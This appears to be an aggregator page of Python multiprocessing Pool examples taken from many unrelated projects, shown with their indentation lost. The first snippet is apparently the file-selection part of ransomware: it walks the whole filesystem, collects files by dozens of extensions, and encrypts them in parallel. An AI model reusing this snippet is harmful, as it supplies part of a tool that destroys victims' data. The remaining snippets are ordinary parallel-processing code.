def select_files():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.append(os.path.join(root, file))
# Parallelize execution of encryption function over four subprocesses
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
Example source code for the Python Pool() class
def get_best_servers(server_list, ping_attempts, valid_protocols):
manager = multiprocessing.Manager()
best_servers = manager.dict()
num_servers = len(server_list)
num_processes = get_num_processes(num_servers)
pool = multiprocessing.Pool(num_processes, maxtasksperchild=1)
pool.map(partial(compare_server, best_servers=best_servers, ping_attempts=ping_attempts, valid_protocols=valid_protocols), server_list)
pool.close()
return best_servers
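The pattern above, a Manager().dict() proxy shared with the workers plus functools.partial to bind the fixed keyword arguments, can be exercised on its own. A minimal, self-contained sketch with a toy stand-in for the real worker (fake_compare_server and its canned result are placeholders):

import multiprocessing
from functools import partial

def fake_compare_server(server, best_servers, ping_attempts, valid_protocols):
    # Toy stand-in mirroring the call shape of compare_server: it writes to the
    # shared Manager dict instead of actually pinging anything.
    best_servers[server] = {"latency_ms": 42, "protocol": valid_protocols[0]}

if __name__ == "__main__":
    manager = multiprocessing.Manager()
    best_servers = manager.dict()
    with multiprocessing.Pool(2) as pool:
        pool.map(partial(fake_compare_server, best_servers=best_servers,
                         ping_attempts=3, valid_protocols=["udp"]),
                 ["a.example", "b.example"])
    print(dict(best_servers))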
def close(self):
try:
logger.debug("Starting to close pooled producer")
super(PooledKafkaProducer, self).close()
assert self.message_buffer_size == 0
logger.debug("Closing the pool")
self.pool.close()
logger.debug("Pool is closed.")
except:
logger.error("Exception occurred when closing pooled producer.")
raise
finally:
# The processes in the pool should be cleaned up in all cases. The
# exception will be re-thrown if there is one.
#
# Joining pools can be flaky in CPython 2.6, and the message buffer
# size is zero here, so terminating the pool is safe and ensure that
# join always works.
self.pool.terminate()
self.pool.join()
def download_chapter_m(self):
'''
Download all pages of the chapter using multiprocessing
'''
results=[]
if not self.pages:
print('No page')
return None
mp=Pool(min(8,max(cpu_count(),4)))
for page in self.pages:
results.append(mp.apply_async(self.download_page,(page,)))
mp.close()
mp.join()
num=sum([result.get() for result in results])
print('Downloaded {} pages'.format(num))
def main():
global ARGS
parser = argparse.ArgumentParser(description='Run a PyWebRunner YAML/JSON script.')
parser.add_argument('-b', '--browser', help='Which browser to load. Defaults to Chrome.')
parser.add_argument('--base-url', help='Base URL to use with goto command.')
parser.add_argument('-t', '--timeout', help='Global wait timeout (in seconds). Defaults to 30.')
parser.add_argument('-p', '--processes', help='Number of processes (browsers) to use. Defaults to 1')
parser.add_argument('-do', '--default-offset', help='New default offset for scroll_to_element. (Default is 0)')
parser.add_argument('--errors', dest='errors', action='store_true', help='Show errors.')
parser.add_argument('--focus', dest='focus', action='store_true', help='Focus the browser on launch.')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose output of commands being executed.')
parser.add_argument('files', nargs='*')
ARGS = parser.parse_args()
processes = ARGS.processes or 1
pool = Pool(int(processes))
pool.map(run_test, ARGS.files)
pool.close()
pool.join()
def multiprocess_find_blocks(profiles, window, n_blocks=None,
block_size=None, n_jobs=-1):
"""Find blocks in profiles (parallel version)."""
intervals = compute_intervals(
size=len(profiles), n_blocks=n_blocks, block_size=block_size)
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
    results = [apply_async(pool, serial_find_blocks,
                           args=(dict(list(profiles.items())[start:end]),
                                 window))
               for start, end in intervals]
dicts = [p.get() for p in results]
pool.close()
pool.join()
blocks = {k: v for d in dicts for k, v in d.items()}
return blocks
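multiprocess_find_blocks calls a module-level apply_async helper that is not shown. A minimal sketch, assuming it simply forwards to pool.apply_async (some codebases use such a wrapper to add dill-based pickling; that variant is not reproduced here):

def apply_async(pool, fun, args):
    # Assumed behaviour: submit fun(*args) to the pool and hand back the
    # AsyncResult so callers can collect it later with .get().
    return pool.apply_async(fun, args)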
def townsend_lombscargle_wrapper(task):
'''
This wraps the function above for use with mp.Pool.
task[0] = times
task[1] = mags
task[2] = omega
'''
try:
return townsend_lombscargle_value(*task)
    # if the LSP calculation fails for this omega, return an npnan (NaN value)
except Exception as e:
return npnan
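A hedged usage sketch for the wrapper: build one (times, mags, omega) tuple per trial frequency and fan the tasks out with Pool.map. The function and variable names below are placeholders, not part of the original module:

import multiprocessing as mp
import numpy as np

def parallel_lsp_sketch(times, mags, omegas, nworkers=4):
    # One task tuple per trial angular frequency, in the shape the wrapper expects.
    tasks = [(times, mags, omega) for omega in omegas]
    with mp.Pool(nworkers) as pool:
        lsp_values = pool.map(townsend_lombscargle_wrapper, tasks)
    return np.array(lsp_values)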
async def calculate(self, *, equation: str):
'''Calculator'''
#_equation = re.sub("[^[0-9]+-/*^%\.]", "", equation).replace('^', "**") #words
replacements = {"pi" : "math.pi", 'e' : "math.e", "sin" : "math.sin", "cos" : "math.cos", "tan" : "math.tan", '^' : "**"}
allowed = set("0123456789.+-*/^%()")
for key, value in replacements.items():
equation = equation.replace(key, value)
equation = "".join(character for character in equation if character in allowed)
print("Calculated " + equation)
with multiprocessing.Pool(1) as pool:
async_result = pool.apply_async(eval, (equation,))
future = self.bot.loop.run_in_executor(None, async_result.get, 10.0)
try:
result = await asyncio.wait_for(future, 10.0, loop = self.bot.loop)
await self.bot.embed_reply("{} = {}".format(equation, result))
except discord.errors.HTTPException:
await self.bot.embed_reply(":no_entry: Output too long")
except SyntaxError:
await self.bot.embed_reply(":no_entry: Syntax error")
except ZeroDivisionError:
await self.bot.embed_reply(":no_entry: Error: Division by zero")
except (concurrent.futures.TimeoutError, multiprocessing.context.TimeoutError):
await self.bot.embed_reply(":no_entry: Execution exceeded time limit")
def get_all_features_m(data):
"""
    returns a vector with extracted features
:param data: datapoints x samples x dimensions (dimensions: EEG,EMG, EOG)
"""
p = Pool(3)
t1 = p.apply_async(feat_eeg,(data[:,:,0],))
t2 = p.apply_async(feat_eog,(data[:,:,1],))
t3 = p.apply_async(feat_emg,(data[:,:,2],))
eeg = t1.get(timeout = 1200)
eog = t2.get(timeout = 1200)
emg = t3.get(timeout = 1200)
p.close()
p.join()
return np.hstack([eeg,emg,eog])
def create_kernels(concurrency, parallel=False):
kernel_ids = []
times_taken = []
if parallel:
pool = multiprocessing.Pool(concurrency)
results = pool.map(run_create_kernel, range(concurrency))
for t, kid in results:
times_taken.append(t)
kernel_ids.append(kid)
else:
for _idx in range(concurrency):
t, kid = run_create_kernel(_idx)
times_taken.append(t)
kernel_ids.append(kid)
print_stat('create_kernel', times_taken)
return kernel_ids
def execute_codes(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_execute_code, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_execute_code(kid)
if t is not None:
times_taken.append(t)
print_stat('execute_code', times_taken)
def restart_kernels(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_restart_kernel, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_restart_kernel(kid)
if t is not None:
times_taken.append(t)
print_stat('restart_kernel', times_taken)
def destroy_kernels(kernel_ids, parallel=False):
times_taken = []
if parallel:
pool = multiprocessing.Pool(len(kernel_ids))
results = pool.map(run_destroy_kernel, kernel_ids)
for t in results:
if t is not None:
times_taken.append(t)
else:
for kid in kernel_ids:
t = run_destroy_kernel(kid)
if t is not None:
times_taken.append(t)
print_stat('destroy_kernel', times_taken)
def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
self.tailed_oplogs = tailed_oplogs
self.backup_oplogs = backup_oplogs
self.compression_supported = ['none', 'gzip']
self.resolver_summary = {}
self.resolver_state = {}
self.running = False
self.stopped = False
self.completed = False
self._pool = None
self._pooled = []
self._results = {}
try:
self._pool = Pool(processes=self.threads(None, 2))
    except Exception as e:
logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
raise Error(e)
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
self.backup_location = self.config.backup.location
self.backup_name = self.config.backup.name
self.remove_uploaded = self.config.upload.remove_uploaded
self.retries = self.config.upload.retries
self.thread_count = self.config.upload.threads
self.rsync_path = self.config.upload.rsync.path
self.rsync_user = self.config.upload.rsync.user
self.rsync_host = self.config.upload.rsync.host
self.rsync_port = self.config.upload.rsync.port
self.rsync_ssh_key = self.config.upload.rsync.ssh_key
self.rsync_binary = "rsync"
self.rsync_flags = ["--archive", "--compress"]
self.rsync_version = None
self._rsync_info = None
self._pool = Pool(processes=self.threads())
def fit(self, X_train, y_train, X_test=None, y_test=None):
"""
"""
if (X_test is None) and (y_test is None):
X_test = X_train
y_test = y_train
elif (X_test is None) or (y_test is None):
raise MissingValueException("Need to provide 'X_test' and 'y_test'")
fun = partial(objective, deepcopy(self.model),
deepcopy(self.model_module),
deepcopy(self.eval_func),
X_train, y_train, X_test, y_test)
pool = Pool(self.n_jobs)
scores = pool.map(fun, deepcopy(self.grid))
self.hyperparam_history = scores
best_params, best_model = self.get_best_params_and_model()
return best_params, best_model
def __call__(self, process_func):
def wrapper(*args):
data_obj = args[1]
if (len(data_obj.shape) <= self.input_dim
or data_obj.shape[-1] == 1):
return process_func(*args)
else:
pool = mp.Pool(mp.cpu_count())# TODO: make configurable
arglist = [
(args[0],) +
(data_obj[...,i],) +
args[2:]
for i in range(data_obj.shape[-1])
]
result = pool.map(self.worker, arglist)
if self.output_dim > self.input_dim: # expanding
return np.stack(result, -1)
else: # contracting
return np.concatenate(result, -1)
return wrapper
def _multitest_binary_pov(self, pov_path, cb_path, enable_randomness, debug, bitflip, timeout, times):
pool = Pool(processes=4)
res = [pool.apply_async(self._test_binary_pov,
(pov_path, cb_path, enable_randomness, debug, bitflip, timeout))
for _ in range(times)]
results = [ ]
for r in res:
try:
results.append(r.get(timeout=timeout + 5))
except TimeoutError:
results.append(False)
return results
sort_counter_mp.py (project: Software-Architecture-with-Python, author: PacktPublishing)
def batch_files(pool_size, limit):
""" Create batches of files to process by a multiprocessing Pool """
batch_size = limit // pool_size
filenames = []
for i in range(pool_size):
batch = []
for j in range(i*batch_size, (i+1)*batch_size):
filename = 'numbers/numbers_%d.txt' % j
batch.append(filename)
filenames.append(batch)
return filenames
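A hypothetical driver for batch_files; count_words here is a placeholder worker, not the project's actual function:

import multiprocessing

def count_words(filenames):
    # Placeholder worker: count whitespace-separated tokens across one batch.
    total = 0
    for name in filenames:
        with open(name) as f:
            total += sum(len(line.split()) for line in f)
    return total

def process_batches(pool_size=4, limit=4000):
    batches = batch_files(pool_size, limit)
    with multiprocessing.Pool(pool_size) as pool:
        # One batch of filenames per worker task.
        return pool.map(count_words, batches)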
def __init__(self, map_func, reduce_func, num_workers=None):
"""
map_func
Function to map inputs to intermediate data. Takes as
argument one input value and returns a tuple with the
key and a value to be reduced.
reduce_func
Function to reduce partitioned version of intermediate
data to final output. Takes as argument a key as
produced by map_func and a sequence of the values
associated with that key.
num_workers
The number of workers to create in the pool. Defaults
to the number of CPUs available on the current host.
"""
self.map_func = map_func
self.reduce_func = reduce_func
self.pool = multiprocessing.Pool(num_workers)
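The constructor only stores the callables and the pool; the driving method is not shown. A minimal sketch of how such a class is typically run, written as a free function so it stands alone (the name and partitioning details are assumptions, not this project's API):

import collections

def run_mapreduce(pool, map_func, reduce_func, inputs, chunksize=1):
    # Map phase in the pool, partition by key in the parent, reduce in the pool.
    mapped = pool.map(map_func, inputs, chunksize=chunksize)
    partitioned = collections.defaultdict(list)
    for key, value in mapped:
        partitioned[key].append(value)
    # reduce_func is assumed to take a single (key, values) tuple, since
    # pool.map passes exactly one argument per call.
    return pool.map(reduce_func, partitioned.items())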
def multi_scrub_text(reviews):
'''
Function to lemmatize text - utilizes multiprocessing for parallelization
INPUT:
reviews: array-like, pandas DataFrame column containing review texts
OUTPUT:
lemmatized: pandas DataFrame column with cleaned texts
'''
lemmatized = []
cpus = cpu_count() - 1
pool = Pool(processes=cpus)
lemmatized = pool.map(lemmatize_text, reviews)
pool.close()
pool.join()
return lemmatized
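Because Pool.map pickles a reference to the worker, lemmatize_text has to be defined at module top level; a lambda or a locally defined function would fail to pickle. A hypothetical call site, with placeholder file and column names:

import pandas as pd

reviews_df = pd.read_csv('reviews.csv')
reviews_df['lemmatized'] = multi_scrub_text(reviews_df['review_text'])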
def multi_core_scrape(num_pages, db_coll):
'''
Map the API scrape across number of processors - 1 for performance boost.
INPUT:
num_pages: int, number of pages to scrape
db_coll: pymongo collection object, collection to add documents to
OUTPUT:
None, records inserted into MongoDB
'''
cpus = cpu_count() - 1
pool = Pool(processes=cpus)
pages = range(1, num_pages + 1)
employers = pool.map(scrape_api_page, pages)
pool.close()
pool.join()
    print('Inserting Employer Records into MongoDB...')
pbar = ProgressBar()
for page in pbar(employers):
db_coll.insert_many(page)
def predict_tf_all(path = None):
result_list = []
p = m_Pool(31)
result_list = p.map(predict_tf_once,range(1,32))
p.close()
p.join()
    print('writing...')
result_df = pd.DataFrame(index = range(1))
for day,result in result_list:
day_s = str(day)
if len(day_s)<=1:
day_s = '0'+day_s
result_df['201610'+day_s] = result
result_df = result_df.T
result_df.columns = ['predict_power_consumption']
    date = str(pd.Timestamp(time.ctime())).replace(' ', '_').replace(':', '_')
    if path is None:
        path = './result/' + date + '.csv'
    result_df.to_csv(path, index_label='predict_date')
l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
t = pd.concat(l)
t.to_csv('./result/predict_part/'+date+'.csv')
def make_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption.apply(np.log)
for user_id in get_user_id_list():
        print(user_id)
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
#p.apply_async(make_features,args=(arg))
p.apply_async(make_month_features,args=(arg))
    print('Waiting for all subprocesses done...')
p.close()
p.join()
def make_history_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption
for user_id in get_user_id_list():
        print(user_id)
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
p.apply_async(make_history_month_features,args=(arg))
    print('Waiting for all subprocesses done...')
p.close()
p.join()
def _reset(self):
'''
Set up some book-keeping variables for optimization. Don't call this
manually.
'''
# Set up some variables for book-keeping
self.epoch = 0
self.best_val_acc = 0
self.best_params = {}
self.loss_history = []
self.val_acc_history = []
self.train_acc_history = []
self.pbar = None
# Make a deep copy of the optim_config for each parameter
self.optim_configs = {}
self.params, self.grad_params = self.model.get_parameters()
# self.weights, _ = self.model.get_parameters()
for p in range(len(self.params)):
        d = {k: v for k, v in self.optim_config.items()}
self.optim_configs[p] = d
self.multiprocessing = bool(self.num_processes-1)
if self.multiprocessing:
self.pool = mp.Pool(self.num_processes, init_worker)
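init_worker is not shown here. A common choice, and only an assumption for this snippet, is an initializer that makes workers ignore SIGINT so Ctrl-C is handled solely by the parent (note the next snippet passes initargs to a different init_worker that sets per-worker state instead):

import signal

def init_worker():
    # Assumed behaviour: workers ignore SIGINT so KeyboardInterrupt is raised
    # only in the parent, which can then terminate and join the pool cleanly.
    signal.signal(signal.SIGINT, signal.SIG_IGN)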
def classify(self,X,Y, use_normalized=True, mask=None):
if self._use_whitened_similarity:
self.precompute_marginals()
self._pool = Pool(initializer=init_worker, initargs=(self._num_instances,
self._conv_param.kernel_h, self._conv_param.kernel_w, self._conv_param.pad[0],
self._conv_param.stride[0], self._im2col_indices, self._pdfs))
probs, preds = self.collect_probs(X, Y, use_normalized, mask=mask)
self._prob_mat = probs
self._Y_hat = preds
self._Y = Y
self._tested = True
if self._use_whitened_similarity:
self._pool.close()
self._pool.join()
self._pool = None
self._pdfs = None
def runBlast(fastaFilePath,blastFilePath,blastCLine,numThreads):
'''Run blast comparing every database against every other in
fastaFilePath. Save to the directory indicated by blastFilePath, using
the blast parameters in blastCLine.'''
# format the databases
dbFileL=glob.glob(fastaFilePath)
formatDb(dbFileL)
# create blast directory
# if directory for blast doesn't exist yet, make it
blastDir = blastFilePath.split("*")[0]
if glob.glob(blastDir)==[]:
os.mkdir(blastDir)
clineL = makeBlastClineList(dbFileL,fastaFilePath,blastFilePath,blastCLine)
p=Pool(numThreads)
stderrL = p.map(subprocessWrapper, clineL)
return
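subprocessWrapper is not shown. A plausible sketch, assuming it runs one BLAST command line and returns whatever the process wrote to stderr (the real helper may differ):

import subprocess

def subprocessWrapper(cline):
    # Assumed helper: run a single BLAST command line (anything whose str() is
    # the shell command) and hand back its stderr output for logging.
    completed = subprocess.run(str(cline), shell=True,
                               capture_output=True, text=True)
    return completed.stderr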
step3_preprocess_validation.py (project: TC-Lung_nodules_detection, author: Shicoder)
def process_images(delete_existing=False, only_process_patient=None):
if delete_existing and os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
print("Removing old stuff..")
if os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
shutil.rmtree(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
if not os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
# os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR + "_labels/")
for subject_no in range(settings.VAL_SUBSET_START_INDEX, settings.VAL_SUBSET_TRAIN_NUM):
src_dir = settings.RAW_SRC_DIR + "val_subset0" + str(subject_no) + "/"
src_paths = glob.glob(src_dir + "*.mhd")
if only_process_patient is None and True:
pool = multiprocessing.Pool(8)
pool.map(process_image, src_paths)
else:
for src_path in src_paths:
print(src_path)
if only_process_patient is not None:
if only_process_patient not in src_path:
continue
process_image(src_path)
step1_preprocess_train.py (project: TC-Lung_nodules_detection, author: Shicoder)
def process_images(delete_existing=False, only_process_patient=None):
if delete_existing and os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
print("Removing old stuff..")
if os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
shutil.rmtree(settings.TRAIN_EXTRACTED_IMAGE_DIR)
if not os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR)
os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR + "_labels/")
for subject_no in range(settings.TRAIN_SUBSET_START_INDEX, settings.TRAIN_SUBSET_TRAIN_NUM):
src_dir = settings.RAW_SRC_DIR + "train_subset0" + str(subject_no) + "/"
src_paths = glob.glob(src_dir + "*.mhd")
if only_process_patient is None and True:
pool = multiprocessing.Pool(6)
pool.map(process_image, src_paths)
else:
for src_path in src_paths:
print(src_path)
if only_process_patient is not None:
if only_process_patient not in src_path:
continue
process_image(src_path)